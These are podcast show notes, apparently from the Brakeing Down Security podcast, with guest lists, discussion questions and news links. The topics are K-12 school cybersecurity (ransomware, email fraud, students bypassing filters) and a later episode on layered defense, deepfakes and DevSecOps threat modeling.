April Mardock - CISO - Seattle Public Schools Jared Folkins - IT Engineer - Bend La Pine Schools Nathan McNulty - Information Security Architect - Beaverton School District OpSecEdu - https://www.opsecedu.com/ Slack https://www.a4l.org/default.aspx https://clever.com/ BEC - https://www.trendmicro.com/vinfo/us/security/definition/business-email-compromise-(bec) https://www.k12cybersecurityconference.org/ https://acpenw.sched.com/ Bypassing security controls - https://www.goguardian.com/blog/technology/how-students-bypass-school-web-filters-and-how-to-stop-them/ https://community.spiceworks.com/topic/2077711-chromebook-google-docs-bypassing-filters https://www.mobicip.com/blog/here%E2%80%99s-how-kids-bypass-apple%E2%80%99s-parental-control-tools https://www.phantomts.com/2020/01/11/kids-can-bypass-communication-limit-feature-on-ios-13-3/ https://www.ocregister.com/2009/02/17/students-accused-of-changing-grades-using-teachers-password/ Security persons at education institutions of varying sizes. https://www.darkreading.com/threat-intelligence/ransomware-crisis-in-us-schools-more-than-1000-hit-so-far-in-2019/d/d-id/1336634 https://www.forbes.com/sites/leemathews/2019/09/25/yet-another-u-s-school-district-has-been-ravaged-by-malware/ https://www.zdnet.com/article/texas-school-district-falls-for-scam-email-hands-over-2-3-million/ Why are schools soft targets? Is money/budget the reason schools get the raw deal here? Why is ransomware such an appealing attack? How complex is the school environment? Mobile, tablets, hostile users, hostile external forces Adding technology too quickly? Outpacing the infrastructure in schools? Just ideas for some questions. - Jared Do you find vendors are very responsive in the education space when receiving a vulnerability report? https://www.edweek.org/ew/articles/2019/09/10/parent-who-criticized-his-sons-math-program.html When students, who you are trying to educate, when they are found doing something inappropriate, how do Districts handle it? https://ktvz.com/news/2017/11/08/mtn-view-hs-bomb-threat-traced-to-eugene-14-year-old/ What challenges do Security people in education face when partnering with their user base? Unlike a corporate setting, many educators and students need to install different software throughout the year, how is that handled? How did April, Nathan, and Jared meet? Is the technology stack in your various school systems changed much in the last 10 years? Have you moved to cloud based, or do you still have an IT shack at the school systems with physical machines? Localadmins are not granted… (excellent!) Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

April Mardock - CISO - Seattle Public Schools Jared Folkins - IT Engineer - Bend La Pine Schools Nathan McNulty - Information Security Architect - Beaverton School District OpSecEdu - https://www.opsecedu.com/ Slack https://www.a4l.org/default.aspx https://clever.com/ BEC - https://www.trendmicro.com/vinfo/us/security/definition/business-email-compromise-(bec) https://www.k12cybersecurityconference.org/ https://acpenw.sched.com/ Bypassing security controls - https://www.goguardian.com/blog/technology/how-students-bypass-school-web-filters-and-how-to-stop-them/ https://community.spiceworks.com/topic/2077711-chromebook-google-docs-bypassing-filters https://www.mobicip.com/blog/here%E2%80%99s-how-kids-bypass-apple%E2%80%99s-parental-control-tools https://www.phantomts.com/2020/01/11/kids-can-bypass-communication-limit-feature-on-ios-13-3/ https://www.ocregister.com/2009/02/17/students-accused-of-changing-grades-using-teachers-password/ Security persons at education institutions of varying sizes. https://www.darkreading.com/threat-intelligence/ransomware-crisis-in-us-schools-more-than-1000-hit-so-far-in-2019/d/d-id/1336634 https://www.forbes.com/sites/leemathews/2019/09/25/yet-another-u-s-school-district-has-been-ravaged-by-malware/ https://www.zdnet.com/article/texas-school-district-falls-for-scam-email-hands-over-2-3-million/ Why are schools soft targets? Is money/budget the reason schools get the raw deal here? Why is ransomware such an appealing attack? How complex is the school environment? Mobile, tablets, hostile users, hostile external forces Adding technology too quickly? Outpacing the infrastructure in schools? Just ideas for some questions. - Jared Do you find vendors are very responsive in the education space when receiving a vulnerability report?https://www.edweek.org/ew/articles/2019/09/10/parent-who-criticized-his-sons-math-program.html When students, who you are trying to educate, when they are found doing something inappropriate, how do Districts handle it?https://ktvz.com/news/2017/11/08/mtn-view-hs-bomb-threat-traced-to-eugene-14-year-old/ What challenges do Security people in education face when partnering with their user base?Unlike a corporate setting, many educators and students need to install different software throughout the year, how is that handled?How did April, Nathan, and Jared meet? Is the technology stack in your various school systems changed much in the last 10 years? Have you moved to cloud based, or do you still have an IT shack at the school systems with physical machines? Localadmins are not granted… (excellent!) Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

https://twitter.com/AlyssaM_InfoSec/status/1159877471161839617?s=19 Looking forward to sharing my vision for ending the 60 year cycle of bad defense strategies in #infosec and my challenge to think about security in a more effective way. https://sched.co/TAqU @dianainitiative #DianaInitiative2019 #cdwsocial @CDWCorp 1961 - MIT - CTSS - https://en.wikipedia.org/wiki/Compatible_Time-Sharing_System Egg, coconut, brick ( my example of security --brbr) Start with critical assets Layer outward, not perimeter in. Medieval castles Create the keep, build out from that Active defenses Dover Castle - https://en.wikipedia.org/wiki/Dover_Castle#/media/File:1_dover_castle_aerial_panorama_2017.jpg Detection defenses - watchguards Mitigation defenses - moats - give time/space to respond (network segmentation) Active countermeasures - knights/archers/cannons DeepFake technology Election year Spoke at RSA Business threat? "Outsider trading" "Video of Elon talking about problems - fake…" Stocks tank - short https://www.vice.com/en_us/article/ywyxex/deepfake-of-mark-zuckerberg-facebook-fake-video-policy Could it be done strategically to destabilize things Extort business leaders Fake videos used to extort Still difficult to create What's the hurdles stopping it from being mainstream? Huge render farms? https://www.youtube.com/watch?v=18LN7VQM1aw - deepfake Sharon Stone/ Steve Buscemi Threat modeling in devSecOps Agile env needs to be quick, fast, and Build it into user stories Shostack's method is a bit weighty How do we implement that in such a way to make dev want to do them? Organizing Virtual cons https://Allthetalks.online - April 15 24 hour conference for charity Talks, followed by interactive channels, community generation Virtual Lobbycon Comedian CFP is open 01 April 2020 Sticker swap! Bsides Atlanta 27-29 March https://bsidesatl.org/ - All virtual this weekend! Infosec Oasis https://Infosecoasis.com - 18 April https://mashable.com/article/zoom-conference-call-work-from-home-privacy-concerns/ https://www.theverge.com/2019/7/10/20689644/apple-zoom-web-server-automatic-removal-silent-update-webcam-vulnerability Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec